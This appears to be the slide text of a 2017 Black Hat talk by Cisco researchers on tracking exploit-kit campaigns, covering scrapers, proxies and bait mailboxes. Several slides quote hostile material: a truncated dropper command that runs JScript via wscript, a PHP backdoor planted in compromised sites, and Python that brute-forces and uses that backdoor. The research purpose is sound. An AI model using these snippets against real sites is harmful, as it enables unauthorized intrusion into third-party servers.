Recommended
More Related Content
What's hot
What's hot (9)
Similar to Exploit Kit Cornucopia - Blackhat USA 2017
Similar to Exploit Kit Cornucopia - Blackhat USA 2017 (20)
Recently uploaded
Recently uploaded (20)
Exploit Kit Cornucopia - Blackhat USA 2017
- 1. Brad Antoniewicz (statements and opinions do not represent the views of, or have been endorsed by, our employer) Matt Foley Exploit Kit Cornucopia
- 2. 2© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Speakers Matt Foley Intern @ Cisco Umbrella CS Major @ NYU Tandon Brad Antoniewicz Researcher @ Cisco Umbrella @brad_anton http://www.zenn.com.sg/Marketplace%20images/Speakers/Tannoy%20Berkeley%20speakers%20(2).JPG
- 3. 3© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Agenda Background Crawling Amplifying Convictions Backdoored Disposable Mailboxes http://fc06.deviantart.net/fs70/i/2013/248/4/3/bearshark_blueprints_wallpaper_1600x900_by_dangerousdeven-d6l544l.png
- 6. 6© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 7. 7© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Pseudo-Darkleech Campaign Using Rig Exploit Kit
- 8. 8© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Kit Script Ransomware , Trojan, etc...
- 9. 9© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c "+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp "gexywoaxor" "http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
- 10. 10© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Landing Page Injection Compromised Site Ad Net. Subscriber Staged Site (Ad) Victim Malvertising Compromised Site RIG Server Gets lander (proxy) Step 1.
- 11. 11© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Filtering Compromised Site Ad Net. Subscriber Staged Site (Ad) RIG Server Victim Malvertising Compromised Site Gets ‘proxy’ TDS/Crawler Filtering TDS TDS, Browser, IP, Region, Time Step 1.
- 12. 12© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 13. 13© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 14. 14© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Delivery Victim Step 1. Step 2. Render iframe Lander Virtual Dedicated Server (VDS) Gets exploit
- 15. 15© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 16. 16© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Exploit Regurgitation CVE-2015-8651 (Flash) CVE-2015-0311 (Flash) CVE-2016-4117 (Flash) CVE-2016-0189 (IE) CVE-2015-2419 (IE)
- 17. 17© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
- 18. 18© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential ektracker.com Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
- 19. 19© 2017 Cisco and/or its affiliates. All rights reserved. Cisco ConfidentialIP/ASN relationships
- 20. 20© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Domains/Registrants
- 21. 21© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraping
- 22. 22© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Orchestration Domains in queue Worker Worker
- 23. 23© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V1 Worker DOM Query site twice, then diff dom/source Requests source Filters
- 24. 24© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Popularity and Spike Google.com Lander
- 25. 25© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V1 BLOCKED
- 26. 26© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Scraper V2 Candidate 1 EK Decoder Module Candidate 2 Candidate 3 Browser (requests) Browser (requests) Detector Module
- 27. 27© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Decoder Module Lander Source and suspected EK passed to decoder EK Decoder Module Flash exploits, executables, etc. Decoder parses JS and identifies EK artifacts
- 28. 28© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Proxy V2 Rotating IPsChoice of regionSquid Proxy
- 29. 29© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Sources for Scraping ektracker.com malware-traffic-analysis.net zerophagemalware.com broadanalysis.com malwarebreakdown.com Credit: @nao_sec (Where to get suspected exploit kit sites)
- 30. 30© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential https://culturedcode.com/things/iphone/makingof/List-02-Sketch.jpg https://s-media-cache-ak0.pinimg.com/736x/51/41/b1/5141b1839f3c8484cf510750044366f7.jpg Amplifying Convictions with Hitlist
- 31. 31© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 32. 32© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Compromised Site: Unknown Backend Logs Gate: Known
- 33. 33© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Conviction: Amplified! S3 Lambda if host in eks: s3.put_object(...) Logs EK List Candidates Filter Convict
- 34. 34© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Teamwork makes the dream work Scraper: Finds Landers, Confirms HitList detections HitList: Finds compromised sites
- 35. 35© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Show graphic of detections! Fancy D3 graph goes here Gates to compromised sites
- 36. 36© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoored
- 37. 37© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Campaign Orchestration Compromised Sites preg_replace(‘/12/e’,$code,‘12’) nav-menu.php backdoor (pseudo-darkleech) Attacker eval()
- 38. 38© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor Obfuscation and ‘Security’ $_passssword = '0a02419ec68460d4a320c53b680441ff'; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); nav-menu.php backdoor
- 39. 39© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential '0a02419ec68460d4a320c53b680441ff'
- 40. 40© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential $url = decrypt_url(‘a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA=’); nav-menu.php backdoor
- 41. 41© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid?
- 42. 42© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential /blog/?manchester&utm_source=82267:1021107:2013 userid?flowid? /blog/?manchester&utm_source=65857:1018137:2013 /blog/?manchester&utm_source=50426:1022174:2013 /blog/?manchester&utm_source=77620:1019894:2013 /blog/?manchester&utm_source=33398:1017062:2013
- 43. 43© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Backdoor access pw = hashlib.md5(‘1021107’).hexdigest() data = { pw: ‘preg_match’, ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } requests.post(compromised_site, data=data)
- 44. 44© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential nginx Apache Reasonable, but still good for us awwwyisssss
- 45. 45© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Brute Forcing data = { ‘a’: ‘//e’, ‘c’: ‘some_php_code’ } for i in range(1010000, 1030000): pw = hashlib.md5(str(i)).hexdigest() data[pw] = ‘preg_match’ requests.post(compromised_site, data=data)
- 46. 46© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential POST Data
- 47. 47© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Bypassing Filtering Compromised Site Staged Site (Ad) RIG Server Request new gates, spoof UserAgent, Source IP, etc..
- 48. 48© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Reliable EK Server Hosting
- 49. 49© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Disposable Mailboxes
- 50. 50© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Not good for research
- 51. 51@brad_anton
- 52. 52© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential MailRunnerIdentifying ransomware and commodity malware Bait Mailboxes Block Dewey Classification Engine Convict, then pass on email attributes
- 53. 53© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Detections (One mailbox) 7.4k Malicious Emails 15k Unique Domains @brad_anton
- 54. 54© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential lacedmail.com
- 55. 55© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Little Things
- 56. 56© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 57. 57© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
- 58. 58© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Recap Good for researchBad guy mistakes :)Amplify convictionsRoll your own scraper/proxy